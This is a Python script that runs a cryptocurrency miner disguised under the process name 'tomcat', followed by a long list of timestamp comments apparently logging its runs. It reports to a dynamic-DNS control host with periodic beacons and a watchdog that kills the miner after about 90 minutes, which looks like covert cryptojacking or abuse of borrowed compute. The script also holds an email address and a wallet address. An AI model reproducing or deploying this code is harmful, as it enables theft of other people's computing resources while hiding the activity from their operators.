import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:05:03.876132
#2018-02-17 16:51:03.557467
#2018-02-17 18:39:02.007864
#2018-02-17 20:26:07.511631
#2018-02-17 22:13:01.909787
#2018-02-17 23:57:05.287429
#2018-02-18 01:48:01.706666
#2018-02-18 03:34:03.890297
#2018-02-18 05:22:05.912932
#2018-02-18 07:13:04.004166
#2018-02-18 09:00:05.326129
#2018-02-18 10:47:01.688397
#2018-02-18 12:29:02.194313
#2018-02-18 14:17:01.905627
#2018-02-18 16:08:01.906107
#2018-02-18 17:56:01.303036
#2018-02-18 19:42:05.404549
#2018-02-18 21:27:01.396340
#2018-02-18 23:16:06.180048
#2018-02-19 01:02:06.286412
#2018-02-19 02:49:04.247547
#2018-02-19 04:36:01.641266
#2018-02-19 06:20:08.549925
#2018-02-19 08:08:07.426391
#2018-02-19 09:58:05.980682
#2018-02-19 11:49:07.512343
#2018-02-19 13:36:06.617876
#2018-02-19 15:24:08.424281
#2018-02-19 17:12:01.944408
#2018-02-19 18:59:01.844497
#2018-02-19 20:46:07.740271
#2018-02-19 22:33:08.113180
#2018-02-20 00:18:07.298822
#2018-02-20 02:06:08.293572
#2018-02-20 03:58:06.690565
#2018-02-20 05:41:01.836954
#2018-02-20 07:26:05.635578
#2018-02-20 09:10:09.347817
#2018-02-20 10:53:01.812963
#2018-02-20 12:41:05.877883
#2018-02-20 14:25:10.161832
#2018-02-20 16:09:04.870898
#2018-02-20 17:54:01.280011
#2018-02-20 19:46:07.059629
#2018-02-20 21:38:04.084998
#2018-02-20 23:19:07.556740
#2018-02-21 01:03:05.245993
#2018-02-21 02:51:04.078438
#2018-02-21 04:40:08.300505
#2018-02-21 06:28:05.505141
#2018-02-21 08:14:04.600102
#2018-02-21 10:01:01.720275
#2018-02-21 11:48:11.136893
#2018-02-21 13:40:04.613244
#2018-02-21 15:24:01.627113
#2018-02-21 17:14:07.193080
#2018-02-21 19:02:04.921937
#2018-02-21 20:49:07.409076
#2018-02-21 22:33:07.928366
#2018-02-22 00:24:04.432330
#2018-02-22 02:12:04.321538
#2018-02-22 03:57:02.108735
#2018-02-22 05:44:04.644481
#2018-02-22 07:29:05.957411
#2018-02-22 09:17:04.003624
#2018-02-22 11:04:05.848481
#2018-02-22 12:53:02.211670
#2018-02-22 14:38:07.344728
#2018-02-22 16:23:07.182907
#2018-02-22 18:11:09.409874
#2018-02-22 20:02:01.529935
#2018-02-22 21:50:09.510895
#2018-02-22 23:37:06.966008
#2018-02-23 01:25:01.342638
#2018-02-23 03:11:05.996794
#2018-02-23 04:59:06.272758
#2018-02-23 06:45:07.663219
#2018-02-23 08:36:02.228947
#2018-02-23 10:51:07.707614
#2018-02-23 12:50:02.863123
#2018-02-23 14:34:01.742952
#2018-02-23 16:25:08.034415
#2018-02-23 18:11:06.021831
#2018-02-23 19:56:01.975633
#2018-02-23 21:40:03.755263
#2018-02-23 23:29:06.581938
#2018-02-24 01:19:04.439844
#2018-02-24 03:09:01.639864
#2018-02-24 04:55:06.066259
#2018-02-24 06:40:07.971894
#2018-02-24 08:29:06.123639
#2018-02-24 10:16:03.790851
#2018-02-24 12:12:04.433158
#2018-02-24 13:58:01.325345
#2018-02-24 15:49:01.896918
#2018-02-24 17:37:03.621154
#2018-02-24 19:23:01.372272
#2018-02-24 21:13:02.265559
#2018-02-24 23:48:07.262019
#2018-02-25 03:08:01.604555
#2018-02-25 06:59:04.595627